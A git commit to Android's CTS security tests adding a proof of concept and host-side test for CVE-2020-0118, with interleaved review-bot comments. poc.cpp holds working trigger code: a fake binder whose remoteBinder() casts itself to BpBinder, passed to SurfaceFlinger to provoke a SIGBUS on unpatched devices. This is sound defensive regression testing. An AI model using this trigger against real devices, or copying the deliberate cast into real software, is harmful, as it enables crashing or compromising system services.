authorTreeHugger Robot <treehugger-gerrit@google.com>2022-01-20 00:30:01 +0000
committerAndroid (Google) Code Review <android-gerrit@google.com>2022-01-20 00:30:01 +0000
commit565871d50ce41598ac2af314fa785429e9fd69bf (patch)
treef2a421edbe24e175650c7037b00be168c0bb50d3
parent0f96e72d9b3e3c1995531d4e668ba58bfe0b726c (diff)
parent954449089eb4c2e17e8b3374529aeee520c7ebc6 (diff)
Merge "[RESTRICT AUTOMERGE] CTS test for Android Security b/150904694" into rvc-dev
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/Android.bp39
-rw-r--r--hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/poc.cpp124
-rw-r--r--hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0118.java42
3 files changed, 205 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/Android.bp
new file mode 100644
index 00000000000..967a0b78c7d
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2020-0118",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ header_libs: [
+ "libgui_headers",
+ "libsurfaceflinger_headers",
+ ],
+ shared_libs: [
+ "libbinder",
+ "libgui",
+ "liblayers_proto",
+ "libsurfaceflinger",
+ "libutils",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/poc.cpp
new file mode 100644
index 00000000000..b6ce3147128
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/poc.cpp
@@ -0,0 +1,124 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+#include "../includes/common.h"
+#include "SurfaceFlinger.h"
+#include "gui/IRegionSamplingListener.h"
+
+bool testInProgress = false;
+
+struct sigaction new_action, old_action;
+void sigbus_handler(int signum, siginfo_t *info, void *context) {
+ if (testInProgress && info->si_signo == SIGBUS) {
+ (*old_action.sa_sigaction)(signum, info, context);
+ return;
+ }
+ _exit(EXIT_FAILURE);
+}
+
+class NewBinder : public android::IBinder {
+public:
+ constexpr static uint32_t arraySize = 16;
+ constexpr static uint32_t elementValue = 0x11111111;
+ uint32_t arr[arraySize] = {};
+
+ NewBinder() {
+ for (uint32_t i = 0; i < arraySize; ++i) {
+ arr[i] = elementValue;
+ }
+ }
+
+ const android::String16 &getInterfaceDescriptor() const {
+ static android::String16 sEmptyDescriptor;
+ return sEmptyDescriptor;
+ }
+
+ bool isBinderAlive() const { return true; }
+
+ android::status_t pingBinder() { return android::NO_ERROR; }
+
+ android::status_t
+ dump(int /* fd */, const android::Vector<android::String16> & /* args */) {
+ return android::NO_ERROR;
+ }
+
+ android::status_t transact(uint32_t /* code */,
+ const android::Parcel & /* data */,
+ android::Parcel * /* reply */,
+ uint32_t /* flags */) {
+ return android::NO_ERROR;
+ }
+
+ android::status_t linkToDeath(
+ const android::sp<android::IBinder::DeathRecipient> & /* recipient */,
+ void * /* cookie */, uint32_t /* flags */) {
+ return android::NO_ERROR;
+ }
+
+ android::status_t unlinkToDeath(
+ const android::wp<android::IBinder::DeathRecipient> & /* recipient */,
+ void * /* cookie */, uint32_t /* flags */,
+ android::wp<android::IBinder::DeathRecipient> * /* outRecipient */) {
+ return android::NO_ERROR;
+ }
+
+ void attachObject(const void * /* objectID */, void * /* object */,
+ void * /* cleanupCookie */,
+ object_cleanup_func /* func */) {}
+
+ void *findObject(const void * /* objectID */) const { return nullptr; }
+
+ void detachObject(const void * /* objectID */) {}
+
+ android::BBinder *localBinder() { return nullptr; }
+
+ android::BpBinder *remoteBinder() {
+ return reinterpret_cast<android::BpBinder *>(this);
+ }
+};
+
+class Listener : public android::BnRegionSamplingListener {
+public:
+ void onSampleCollected(float /* medianLuma */) {}
+};
+
+int main() {
+ sigemptyset(&new_action.sa_mask);
+ new_action.sa_flags = SA_SIGINFO;
+ new_action.sa_sigaction = sigbus_handler;
+ sigaction(SIGBUS, &new_action, &old_action);
+
+ android::sp<Listener> listener = new Listener();
+ FAIL_CHECK(listener);
+
+ const android::Rect sampleArea{100, 100, 200, 200};
+ const android::sp<android::IBinder> &stopLayerHandle = new NewBinder();
+ FAIL_CHECK(stopLayerHandle);
+
+ android::sp<android::SurfaceFlinger> flinger =
+ android::surfaceflinger::createSurfaceFlinger();
+ FAIL_CHECK(flinger);
+
+ android::sp<android::ISurfaceComposer> composer = flinger;
+ testInProgress = true;
+ android::status_t status = composer->addRegionSamplingListener(
+ sampleArea, stopLayerHandle, listener);
+ testInProgress = false;
+ FAIL_CHECK(status == android::NO_ERROR);
+
+ return EXIT_SUCCESS;
+}
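Review bot: In sigbus_handler the chained call `(*old_action.sa_sigaction)(signum, info, context)` assumes the disposition saved by sigaction() in main was a three-argument handler; if it was SIG_DFL or SIG_IGN, or if the unchecked sigaction() call failed and left old_action zeroed, the call goes through an invalid pointer and the process dies with a different signal than the SIGBUS this test is meant to surface. Guard the chain on `old_action.sa_flags & SA_SIGINFO` and fall back to the default disposition, as in the excerpt below, and check the registration in main with `FAIL_CHECK(sigaction(SIGBUS, &new_action, &old_action) == 0);` (assuming FAIL_CHECK from common.h accepts any boolean expression, as its other uses here suggest). testInProgress is written in main and read inside the handler, so `volatile sig_atomic_t testInProgress = 0;` would be the safer declaration. NewBinder::remoteBinder returning `reinterpret_cast<android::BpBinder *>(this)` appears to be the deliberate trigger for the regression check and deserves a one-line comment saying so, so that nobody later "corrects" it.

```cpp
void sigbus_handler(int signum, siginfo_t *info, void *context) {
    if (testInProgress && info->si_signo == SIGBUS) {
        if ((old_action.sa_flags & SA_SIGINFO) && old_action.sa_sigaction != nullptr) {
            (*old_action.sa_sigaction)(signum, info, context);
        } else {
            // No three-argument handler was installed before this one: restore the
            // default disposition so the fault is delivered again after returning.
            signal(SIGBUS, SIG_DFL);
        }
        return;
    }
    // … unchanged: _exit(EXIT_FAILURE) for a SIGBUS outside the test window …
}
```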
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0118.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0118.java
new file mode 100644
index 00000000000..04c9a05df9f
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0118.java
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.runner.RunWith;
+import org.junit.Test;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0118 extends SecurityTestCase {
+
+ /**
+ * b/150904694
+ * Vulnerability Behaviour: SIGBUS in self
+ */
+ @AsbSecurityTest(cveBugId = 150904694)
+ @Test
+ public void testPocCVE_2020_0118() throws Exception {
+ String signals[] = {CrashUtils.SIGBUS};
+ String binaryName = "CVE-2020-0118";
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.setSignals(signals);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
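Review bot: The crash config in testPocCVE_2020_0118 matches only `CrashUtils.SIGBUS`, so a fault in the PoC process that is delivered as any other signal would presumably not be counted as a failure, and the Javadoc's "SIGBUS in self" does not say why that one signal is enough. A comment above the `signals` declaration would make the coupling with poc.cpp explicit, for example `// Only SIGBUS is matched: poc.cpp forwards SIGBUS to the previous handler while the call under test runs.` As a style point, `String signals[]` uses the C-style array form; `String[] signals = {CrashUtils.SIGBUS};` is the conventional Java spelling.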